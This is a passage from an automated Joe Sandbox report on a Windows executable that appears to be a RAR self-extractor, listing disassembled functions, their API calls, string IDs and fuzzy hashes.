                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00409385
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 004093C1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                      • String ID: rtmp%d
                                                                                      • API String ID: 2111052971-3303766350
                                                                                      • Opcode ID: b36b5496d672a55cb92720030ca1c5a69dec933b501ad3bd36a30767ab934666
                                                                                      • Instruction ID: 5923151a2b79eddddca29a82f35e8e34e5e7094cd9aabbd88d137f67cf1ad4f4
                                                                                      • Opcode Fuzzy Hash: b36b5496d672a55cb92720030ca1c5a69dec933b501ad3bd36a30767ab934666
                                                                                      • Instruction Fuzzy Hash: CE417D72911159A6DF20FB618D94EDF777CAF48384F0040BBA945B31C2DA389F858F68
                                                                                      Function 00417EE5 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 124memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00418705,?), ref: 00417FBA
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00417FDB
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00418002
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                      • API String ID: 4094277203-4209811716
                                                                                      • Opcode ID: 2c6ee4626a2331b8ae484ca2573070ef1fdca91c39751fbc1afd53911b5e376a
                                                                                      • Instruction ID: 3fe88d14127c8c190e5082730d9f3cd5f07b94ad7e1d51cfd9cfa5b599301d5f
                                                                                      • Opcode Fuzzy Hash: 2c6ee4626a2331b8ae484ca2573070ef1fdca91c39751fbc1afd53911b5e376a
                                                                                      • Instruction Fuzzy Hash: B43125322083157ED724AB61AC06FEB77A8DF56324F10411FF510962D2EBBC9949C7AE
                                                                                      Function 00417D96 Relevance: 12.1, APIs: 8, Instructions: 135windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00417DAF
                                                                                      • GetTickCount.KERNEL32 ref: 00417DCD
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00417DE3
                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00417DF7
                                                                                      • TranslateMessage.USER32(?), ref: 00417E02
                                                                                      • DispatchMessageW.USER32(?), ref: 00417E0D
                                                                                      • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00417EBD
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00417EC7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4150546248-0
                                                                                      • Opcode ID: e09ca88346825f43c4ff049f472439daf505c3d9ad9a0bc8bc234b5a3ba46f3e
                                                                                      • Instruction ID: 48f4f99f710a1e2d553cc0d0471405a6e3ede0267bab1b5868266d61c015fd63
                                                                                      • Opcode Fuzzy Hash: e09ca88346825f43c4ff049f472439daf505c3d9ad9a0bc8bc234b5a3ba46f3e
                                                                                      • Instruction Fuzzy Hash: 1E417C71208306AFD714DF65D8889ABBBF9EF49704B00086EF645C7260DB75EC85CB66
                                                                                      Function 0040FE20 Relevance: 12.1, APIs: 8, Instructions: 117timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __aulldiv.LIBCMT ref: 0040FE33
                                                                                        • Part of subcall function 0040A8E0: GetVersionExW.KERNEL32(?), ref: 0040A905
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0040FE5C
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0040FE6E
                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0040FE7B
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040FE91
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040FE9D
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040FED3
                                                                                      • __aullrem.LIBCMT ref: 0040FF5D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                      • String ID:
                                                                                      • API String ID: 1247370737-0
                                                                                      • Opcode ID: 5d8a5fa99429d7802b0bb141fa481349d5ee951a6866c5d67b11b3c325dc38cc
                                                                                      • Instruction ID: 601add3c93f3a7f035f9473b8cc32af6cb248ae7865e7a3dfe0d44872f6059f1
                                                                                      • Opcode Fuzzy Hash: 5d8a5fa99429d7802b0bb141fa481349d5ee951a6866c5d67b11b3c325dc38cc
                                                                                      • Instruction Fuzzy Hash: 334127B24083069FC324DF65C8809ABB7F8FB88704F004A3FF59692650E739E549DB5A
                                                                                      Function 0042C56D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0042CCE2,00000000,00000000,00000000,00000000,00000000,?), ref: 0042C5AF
                                                                                      • __fassign.LIBCMT ref: 0042C62A
                                                                                      • __fassign.LIBCMT ref: 0042C645
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0042C66B
                                                                                      • WriteFile.KERNEL32(?,00000000,00000000,0042CCE2,00000000,?,?,?,?,?,?,?,?,?,0042CCE2,00000000), ref: 0042C68A
                                                                                      • WriteFile.KERNEL32(?,00000000,00000001,0042CCE2,00000000,?,?,?,?,?,?,?,?,?,0042CCE2,00000000), ref: 0042C6C3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1324828854-0
                                                                                      • Opcode ID: d9acd57c132f120ad228fa2c22bff78946110b1bd24e1418b6adb82457bff21c
                                                                                      • Instruction ID: d9b65743dcec8efc29dffba9d92f3b7f5f7b6d2574bf834644e5116cd7b81687
                                                                                      • Opcode Fuzzy Hash: d9acd57c132f120ad228fa2c22bff78946110b1bd24e1418b6adb82457bff21c
                                                                                      • Instruction Fuzzy Hash: 0D51B2B1A002199FCB10CFA8E885AEEBBF4FF59300F14416BE555E7291E7349941CFA9
                                                                                      Function 0041B0D9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000800,?), ref: 0041B0EF
                                                                                      • _swprintf.LIBCMT ref: 0041B123
                                                                                        • Part of subcall function 00403F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00403F6E
                                                                                      • SetDlgItemTextW.USER32(?,00000066,00443122), ref: 0041B143
                                                                                      • _wcschr.LIBVCRUNTIME ref: 0041B176
                                                                                      • EndDialog.USER32(?,00000001), ref: 0041B257
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                      • String ID: %s%s%u
                                                                                      • API String ID: 2892007947-1360425832
                                                                                      • Opcode ID: 3bed67ce46b515fc53cc560e750194bb10b06e70f88f773bb0531f635cbe4b53
                                                                                      • Instruction ID: 5c82ace82daf2208cb4ed878d56abfa672e64c7e08e6e3ab4fe6cab1f46fe378
                                                                                      • Opcode Fuzzy Hash: 3bed67ce46b515fc53cc560e750194bb10b06e70f88f773bb0531f635cbe4b53
                                                                                      • Instruction Fuzzy Hash: F8419E71900219AEEF25DB60DC85EEF77BCEB14345F0040ABF408E6191EB788B848F99
                                                                                      Function 0040C91F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strlen$_swprintf_wcschr_wcsrchr
                                                                                      • String ID: %08x
                                                                                      • API String ID: 1593746830-3682738293
                                                                                      • Opcode ID: b6f28b39ee9bd0df7e70242c3cee28be0868e59a415387a8d1f4e906bcfd9656
                                                                                      • Instruction ID: c9ad045ea826598dc5790c2a097c50e60768af02d2bc592e8fe4a308f7d8e605
                                                                                      • Opcode Fuzzy Hash: b6f28b39ee9bd0df7e70242c3cee28be0868e59a415387a8d1f4e906bcfd9656
                                                                                      • Instruction Fuzzy Hash: 7541B272A04354EAD730A725CC89FBB62DCDB85714F10063BF948A72C2D67C9D45C6AA
                                                                                      Function 0041859C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(?,00000000), ref: 004185B5
                                                                                      • GetWindowRect.USER32(?,?), ref: 004185DA
                                                                                      • ShowWindow.USER32(?,00000005,?), ref: 00418671
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00418679
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 0041868F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Show$RectText
                                                                                      • String ID: RarHtmlClassName
                                                                                      • API String ID: 3937224194-1658105358
                                                                                      • Opcode ID: 31c15fb96e7a5b38f9dece7491b379e91fc524e0c88f33f425ca3179d6983491
                                                                                      • Instruction ID: b9dbe71992cf54109f0a2f08805896309cf4031f1c28e39b89479440570d00e5
                                                                                      • Opcode Fuzzy Hash: 31c15fb96e7a5b38f9dece7491b379e91fc524e0c88f33f425ca3179d6983491
                                                                                      • Instruction Fuzzy Hash: 2531C132540304AFCB109F649D4CF5BBBA8FF48701F04442AFE499A292DB74E810CBAA
                                                                                      Function 0042930F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004292D3: _free.LIBCMT ref: 004292FC
                                                                                      • _free.LIBCMT ref: 0042935D
                                                                                        • Part of subcall function 004259C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?), ref: 004259D8
                                                                                        • Part of subcall function 004259C2: GetLastError.KERNEL32(?,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?,?), ref: 004259EA
                                                                                      • _free.LIBCMT ref: 00429368
                                                                                      • _free.LIBCMT ref: 00429373
                                                                                      • _free.LIBCMT ref: 004293C7
                                                                                      • _free.LIBCMT ref: 004293D2
                                                                                      • _free.LIBCMT ref: 004293DD
                                                                                      • _free.LIBCMT ref: 004293E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                      • Instruction ID: 329fbb860909e2112fafce03e7f7f98c322d102f6737cd64bb203afe2e51e2b1
                                                                                      • Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                      • Instruction Fuzzy Hash: 3C115EB1B41B24F6D920BB72ED07FCB77AC5F04708FC44C1AB299E6092DA78B9444664
                                                                                      Function 00420C14 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00420C0B,0041E662), ref: 00420C22
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00420C30
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00420C49
                                                                                      • SetLastError.KERNEL32(00000000,?,00420C0B,0041E662), ref: 00420C9B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: b842a87227fb7387e7a5ceea4eeeada40c6d45f11a6d0edb67ea972190fb7fa6
                                                                                      • Instruction ID: 8b9ecc5f6ed396bb8fb9180011c444437e6625ddb262a5cc42c9d5bde12d0b84
                                                                                      • Opcode Fuzzy Hash: b842a87227fb7387e7a5ceea4eeeada40c6d45f11a6d0edb67ea972190fb7fa6
                                                                                      • Instruction Fuzzy Hash: A801D4B23893355EAB292AB67C859272A98EB117B9BB0033FF520501F2EE294C11518D
                                                                                      Function 0041C7FD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                      • API String ID: 0-1718035505
                                                                                      • Opcode ID: ff2253f3daf32d4d3de00c01ce552598c65b0d0e0cb496f525ffa21868918c9a
                                                                                      • Instruction ID: 20d3aaa082a4ed3a9640bd11e3999cf40b280264533ef8538f4cac0fcdb3d047
                                                                                      • Opcode Fuzzy Hash: ff2253f3daf32d4d3de00c01ce552598c65b0d0e0cb496f525ffa21868918c9a
                                                                                      • Instruction Fuzzy Hash: F001D1B2AC13325B4F203EB56CD46E727949A067973202A3BE810D3350E718C8C5E6ED
                                                                                      Function 00410050 Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 004100AE
                                                                                        • Part of subcall function 0040A8E0: GetVersionExW.KERNEL32(?), ref: 0040A905
                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004100D0
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 004100EA
                                                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 004100FB
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041010B
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00410117
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                                      • String ID:
                                                                                      • API String ID: 2092733347-0
                                                                                      • Opcode ID: 6b2897f1808b1d0a7cc052cee766c89f4fe322d3d0f8d389d52ac723ee4b9e97
                                                                                      • Instruction ID: 0b4916178763dc66620a194639bfef4680fe520ebf1d1e987176b8f9a8a90618
                                                                                      • Opcode Fuzzy Hash: 6b2897f1808b1d0a7cc052cee766c89f4fe322d3d0f8d389d52ac723ee4b9e97
                                                                                      • Instruction Fuzzy Hash: 0931F47A1083459BC704DFA5D9809ABB7F8FF98704F04492EF999C3210E734E549CB2A
                                                                                      Function 00418206 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      • Opcode ID: 5d4a9c7590df4a7a3f066a26f0cbd8db67f99bc0d1f2f6b85be5233878dda6a5
                                                                                      • Instruction ID: 6ff5062d3f8463062aaa34de807ed55c5573daeccb318b40f3d77ae47cbf6415
                                                                                      • Opcode Fuzzy Hash: 5d4a9c7590df4a7a3f066a26f0cbd8db67f99bc0d1f2f6b85be5233878dda6a5
                                                                                      • Instruction Fuzzy Hash: E82128B560050AABD7055A11CC81FFB77ACAF54758F14426FFC088A202F77CDDC14699
                                                                                      Function 0040FB02 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0040FB07
                                                                                      • EnterCriticalSection.KERNEL32(00441E74,00000000,?,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF,?), ref: 0040FB15
                                                                                      • new.LIBCMT ref: 0040FB35
                                                                                      • new.LIBCMT ref: 0040FB6B
                                                                                      • LeaveCriticalSection.KERNEL32(00441E74,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF,?,00008000,?), ref: 0040FB8B
                                                                                      • LeaveCriticalSection.KERNEL32(00441E74,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF,?,00008000,?), ref: 0040FB96
                                                                                        • Part of subcall function 0040F930: InitializeCriticalSection.KERNEL32(000001A0,00441E74,00000000,?,?,0040FB88,00000020,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?), ref: 0040F969
                                                                                        • Part of subcall function 0040F930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF), ref: 0040F973
                                                                                        • Part of subcall function 0040F930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF), ref: 0040F983
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                                                                      • String ID:
                                                                                      • API String ID: 3919453512-0
                                                                                      • Opcode ID: c56474174169346508d1e9649acf93e9edf1adbe36175df3016f18d90880808a
                                                                                      • Instruction ID: 086c70df32f7b29fe9b58630c0a4ed6e262e1e33b7e3bbb7ea3b2846072d0a1f
                                                                                      • Opcode Fuzzy Hash: c56474174169346508d1e9649acf93e9edf1adbe36175df3016f18d90880808a
                                                                                      • Instruction Fuzzy Hash: 04110A38A012119BD7149B69EC55BBE76B4EB45B14F10013FF805E77E0DB789845CB5C
                                                                                      Function 0042631F Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
